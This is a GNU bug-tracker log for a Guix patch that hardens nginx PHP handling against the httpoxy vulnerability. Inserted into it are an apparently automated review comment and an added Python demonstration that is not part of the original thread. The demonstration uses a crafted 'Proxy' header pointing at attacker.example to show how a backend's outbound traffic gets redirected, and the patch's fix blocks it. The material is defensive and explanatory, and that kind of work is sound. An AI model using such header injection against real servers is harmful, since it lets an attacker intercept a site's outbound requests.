GNU bug report logs -
#62678
[PATCH] services: nginx: Harden php-location settings.
Reported by: Bruno Victal <mirai <at> makinata.eu>
Date: Wed, 5 Apr 2023 15:35:02 UTC
Severity: normal
Tags: patch, security
Done: Tobias Geerinckx-Rice <me <at> tobias.gr>
Bug is archived. No further changes may be made.
Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):
Incorporate advice from [2], which mitigates the httpoxy[1] vulnerability and
disallows passing non-php files to the PHP backend.
[1]: <https://httpoxy.org/>
[2]: <https://www.nginx.com/resources/wiki/start/topics/examples/phpfcgi/>,
note 4.
* gnu/services/web.scm (nginx-php-location): Only pass existing php files to
backend. Mitigate httpoxy vulnerability.
---
Tested with: make check-system TESTS="nginx php-fpm"
gnu/services/web.scm | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/gnu/services/web.scm b/gnu/services/web.scm
index d56e893527..f5ed027bb4 100644
--- a/gnu/services/web.scm
+++ b/gnu/services/web.scm
@@ -1123,6 +1123,10 @@ (define* (nginx-php-location
(uri "~ \\.php$")
(body (list
"fastcgi_split_path_info ^(.+\\.php)(/.+)$;"
+ ;; Mitigate https://httpoxy.org/ vulnerabilities
+ "fastcgi_param HTTP_PROXY \"\";"
+ ;; Only pass existing php files to the backend.
+ "if (!-f $document_root$fastcgi_script_name) { return 404; }"
(string-append "fastcgi_pass unix:" socket ";")
"fastcgi_index index.php;"
(list "include " nginx-package "/share/nginx/conf/fastcgi.conf;")))))
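Review bot: the `if (!-f $document_root$fastcgi_script_name) { return 404; }` line could be written as `try_files $fastcgi_script_name =404;`, which yields the same 404 for a missing script without an `if` block; a bare `return` inside a location-level `if` is one of the documented-safe uses, so the hunk is correct as written and this is a style point only. Two observations on the surrounding context: because the location is `~ \\.php$`, the `(/.+)$` tail of `fastcgi_split_path_info` on the line above can never match, so `$fastcgi_script_name` is always the whole URI here and the `-f` test does cover a request like `/uploads/image.jpg/x.php`, which is the non-php-file case the commit message is guarding against. And the position of `fastcgi_param HTTP_PROXY "";` relative to the later `include ... fastcgi.conf` does not matter: once a `fastcgi_param` named HTTP_PROXY exists in the location, nginx drops the client's `Proxy:` header rather than forwarding it, whichever line sets it.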
base-commit: 6311493d7a6271bfbc51f4693857f9a12fe9965d
--
2.39.2
Message #8 received at 62678 <at> debbugs.gnu.org (full text, mbox):
I wonder if we should at least make the HTTP_PROXY variable
configurable. It may need to be set to something else than "" in some
scenarios. I don't know...
Message #11 received at 62678 <at> debbugs.gnu.org (full text, mbox):
Hi Jonathan,
On 2023-04-05 21:19, Jonathan Brielmaier wrote:
> I wonder if we should at least make the HTTP_PROXY variable
> configurable. It may need to be set to something else then "" in some
> scenarios. I don't know...
No, there's no legitimate reason for this, since 'PROXY' is not
a standard HTTP header according to [1]. PROXY being passed to a cgi application
as HTTP_PROXY is what the exploit is about, since HTTP_PROXY is recognized as
a variable for configuring proxies (for curl, wget, etc.)
Allowing HTTP_PROXY to be set remotely (due to a confusion with the non-standard 'PROXY' header)
is simply incomprehensible.
Regarding user intent, that is, configuring the proxy used by the cgi application by
setting HTTP_PROXY via nginx?
I don't have this use-case but IMO it feels like an extremely poor design, since it's
exploiting a name confusion to change the system environment variables for the
cgi application.
If for some reason you really need this, you can always use the regular
nginx-location-configuration to manually craft a php-location.
[1]: https://www.iana.org/assignments/http-fields/http-fields.xhtml
Cheers,
Bruno
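An added example (not code from the thread or from Guix) of the name confusion Bruno describes: a client-supplied `Proxy:` header becomes the `HTTP_PROXY` meta-variable under the CGI naming rule, and a client library in the backend then treats it as its proxy setting. The toy front end below mirrors the nginx rule that an explicitly set `fastcgi_param` of the same name replaces the client's header, which is all `fastcgi_param HTTP_PROXY "";` does; the request headers and paths are constructed, and `naive_proxy` stands in for curl/wget-style proxy discovery.

```python
import os
import urllib.request
from unittest import mock

# Constructed request: the attacker adds a "Proxy" header, which is not a
# registered HTTP field, so nothing on the path has a reason to strip it.
ATTACK_REQUEST = [
    ("Host", "example.org"),
    ("Proxy", "http://attacker.example:8080"),
]


def cgi_meta_variables(request_headers, explicit_params):
    """HTTP_* meta-variables a FastCGI front end derives from request headers
    (RFC 3875 section 4.1.18: upper-case, '-' -> '_', 'HTTP_' prefix).
    Mirrors nginx's rule that a client header is not forwarded when a
    fastcgi_param of the same name is set explicitly; the explicit value wins."""
    meta = dict(explicit_params)
    for name, value in request_headers:
        var = "HTTP_" + name.upper().replace("-", "_")
        if var in explicit_params:
            continue          # this is what `fastcgi_param HTTP_PROXY "";` buys us
        meta[var] = value
    return meta


def backend_env(request_headers, hardened):
    """Environment the PHP backend sees for one request (paths are made up)."""
    params = {"REQUEST_METHOD": "GET", "SCRIPT_FILENAME": "/srv/www/index.php"}
    if hardened:
        params["HTTP_PROXY"] = ""           # the patch's fastcgi_param line
    return cgi_meta_variables(request_headers, params)


def naive_proxy(env):
    """Proxy discovery as done by curl, wget and pre-httpoxy client libraries:
    any non-empty HTTP_PROXY / http_proxy in the environment is honoured."""
    for key in ("HTTP_PROXY", "http_proxy"):
        if env.get(key):
            return env[key]
    return None


def outbound_proxy(request_headers, hardened):
    """Where the backend's outgoing HTTP requests would be sent."""
    return naive_proxy(backend_env(request_headers, hardened))


def stdlib_proxy_view(request_headers, hardened):
    """Same environment as seen by CPython's urllib, which since its httpoxy fix
    (CVE-2016-1000110) ignores HTTP_PROXY whenever REQUEST_METHOD is set,
    i.e. whenever it is running under a CGI-style server."""
    with mock.patch.dict(os.environ, backend_env(request_headers, hardened), clear=True):
        return urllib.request.getproxies_environment().get("http")


if __name__ == "__main__":
    print("unhardened, naive client:  ", outbound_proxy(ATTACK_REQUEST, False))
    print("hardened,   naive client:  ", outbound_proxy(ATTACK_REQUEST, True))
    print("unhardened, CPython urllib:", stdlib_proxy_view(ATTACK_REQUEST, False))
```

The unhardened run sends the backend's outbound traffic through the attacker's host; the hardened run leaves the naive client with no proxy at all. The last function shows the other place this can be fixed: a client library that knows it is running under CGI can refuse to trust `HTTP_PROXY` itself, but the front end cannot assume every library in the backend does, which is why the header is dropped at the nginx layer.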
Added tag(s) security. Request was from Bruno Victal <mirai <at> makinata.eu> to control <at> debbugs.gnu.org. (Thu, 22 Jun 2023 13:34:02 GMT)
Reply sent to Tobias Geerinckx-Rice <me <at> tobias.gr>: You have taken responsibility. (Fri, 07 Jul 2023 14:23:02 GMT)
Notification sent to Bruno Victal <mirai <at> makinata.eu>: bug acknowledged by developer. (Fri, 07 Jul 2023 14:23:02 GMT)
Message #18 received at 62678-done <at> debbugs.gnu.org (full text, mbox):
Hi Bruno,
Bruno Victal wrote:
> Incorporate advice from [2], which mitigates httpoxy[1]
> vulnerability and
> disallows passing non-php files to the PHP backend.
>
> [1]: <https://httpoxy.org/>
> [2]:
> <https://www.nginx.com/resources/wiki/start/topics/examples/phpfcgi/>,
> note 4.
This is a better comment than a commit message. I made it so and
pushed your changes as commit
cbc14b3baea457cf2718b85f767d39ff3911ce91.
Thanks!
T G-R
bug archived. Request was from Debbugs Internal Request <help-debbugs <at> gnu.org> to internal_control <at> debbugs.gnu.org. (Sat, 05 Aug 2023 11:24:08 GMT)
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.